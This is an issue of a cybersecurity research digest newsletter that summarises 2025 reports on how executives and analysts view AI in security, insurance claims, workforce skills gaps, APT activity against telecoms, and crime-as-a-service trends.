CRD #22
On diverging enthusiasm for AI in security, attack cost trends, workforce gaps, APT activity, and the latest in cybercrime ops.
The Cybersecurity Research Digest cuts through the marketing fluff and bias to bring you relevant and objective insights on cybersecurity stats and trends, all backed by empirical data.
This post features highlights from trustworthy research sources released between April 30 and May 19, 2025, followed by a list of all monitored reports.
TL;DR
- Executives see AI as a productivity boost, but analysts remain skeptical due to false positives and added complexity.
- BEC and funds transfer fraud dominate insurance claims, while ransomware remains the most costly.
- The workforce gap is driven by missing skills, not open roles, with salary the top retention factor.
- APT activity rose 45%, with Chinese groups heavily targeting telcos and evasion tactics evolving.
- Cybercrime is scaling fast via automation and AI, with massive growth in credential theft and exploit attempts.
Using AI for security: strategic enthusiasm, operational caution
A survey of over 1,000 cybersecurity professionals reveals a stark divide in how AI is perceived across organizational levels. While 71% of executives believe AI has significantly improved productivity, only 22% of frontline analysts agree. Analysts tend to see AI as reshaping, rather than reducing, their workload. Concerns cited include hallucinations, false positives, and increased complexity.
This divergence also appears in the willingness to let AI act autonomously. 38% of executives said they were open to this, compared to just 10% of analysts. While 38% is surprisingly high, it's important to note that the survey did not define what constitutes "AI", meaning the responses may not necessarily reflect willingness to adopt novel and still-maturing technologies based on LLMs. Regardless, the gap underscores the need for alignment between strategic vision and operational reality before depending on AI for critical capabilities.
Insurance data: BEC and funds transfer fraud dominate, ransomware most damaging
Data from cyber insurance claims filed with a global insurer in 2024 shows that both the frequency and severity of incidents have remained relatively stable compared to 2023. While the dataset is skewed towards insured organizations (which may thus be better prepared than the "average" organization) the trend points to year-over-year stability.
The data from 2024 shows that email-based threats remain dominant, with business email compromise (BEC) and funds transfer fraud (FTF) accounting for 60% of all claims.
Ransomware, though representing one-fifth of cases, carried significantly higher impact: average losses per incident reached $292,000, with 44% of victims opting to pay the ransom.
It’s a skills gap, not a headcount crisis
A global survey of 3,400 cybersecurity managers and HR professionals suggests the cyber workforce shortage is less about unfilled positions and more about the lack of necessary skills. The popular narrative - often amplified by certification companies - that "cyber offers endless career opportunities" is shifting: the focus is not on increasing headcount, but on finding people with the right competencies.
For employee retention as well as attraction, salary naturally remains the dominant factor by a wide margin. Other important elements include benefits, opportunities for upskilling, and a positive workplace culture.
Telcos in the crosshairs as Chinese APTs dominate detections
Threat detection data from Trellix covering October 2024 to April 2025 shows that APT-related activity increased 45% globally over the last two quarters. The telecommunications sector received the bulk of this activity - representing 47% of all detections - followed by transportation and shipping.
Telco targeting may relate to the fact that the Chinese groups APT40 and Mustang Panda were responsible for nearly half of all detected APT activity (think Salt Typhoon). As for Russian activity, Sandworm, the APT group known for targeting Ukrainian critical infrastructure, was also showing increased activity.
The same reporting projects between 41,000 and 50,000 new CVEs in 2025. Despite the volume, phishing remains the top initial access vector, followed by exploitation of known vulnerabilities.
Once access is gained, threat actors heavily rely on legitimate system tools and living-off-the-land binaries (LOLBins). These are used to blend into normal operations, evade detection, and ensure redundancy. The research also points out that the use of memory-resident techniques, fileless malware, and signed binaries has overtaken custom malware.
Crime-as-a-service expands rapidly, powered by AI and automation
Fortinet’s 2024 threat landscape report highlights explosive growth in the underground economy for stolen credentials and corporate access. Credential theft rose 42% year-over-year, with the use of infostealers like Redline and Vidar showing most growth. Over 1.7 billion stolen credential records were shared on darknet forums, and Initial Access Broker (IAB) activity saw a notable rise in listings for VPN, RDP, and admin panel access.
Automation and operational scale continue to accelerate, with automated scanning reaching record highs in 2024, rising 16.7% globally. Exploitation activity also surged, with Fortinet tracking more than 97 billion attempts across the year. Despite the volume, the average time to exploit newly disclosed vulnerabilities held steady at 5.4 days, underscoring a sustained tempo rather than an accelerating one and offering a degree of reassurance to teams that have invested in automation for vulnerability management.
This accelerating automation trend is and will be further supercharged by the growing role of AI in cybercriminal operations. Fortinet’s report underscores how tools such as FraudGPT, BlackmailerV3, and ElevenLabs are being used to generate malware, automate phishing websites, create deepfake content, and synthesize convincing audio. These capabilities amplify both the scale and sophistication of malicious campaigns, making them faster to launch, more believable, and harder to defend against.
Reports monitored: April 30 - May 19
To take a deeper dive in the topics most relevant for you, find below a list of all the monitored research reports (41) that were published during the observed period.
About
evisec's Cybersecurity Research Digest provides security leaders verified strategic insights via a carefully curated weekly summary of evidence-led, unbiased and objective cybersecurity research publications. Read more about our service here.
✉️ Suggestions or want to collaborate? Get in touch via LinkedIn or email (henry@evisec.xyz)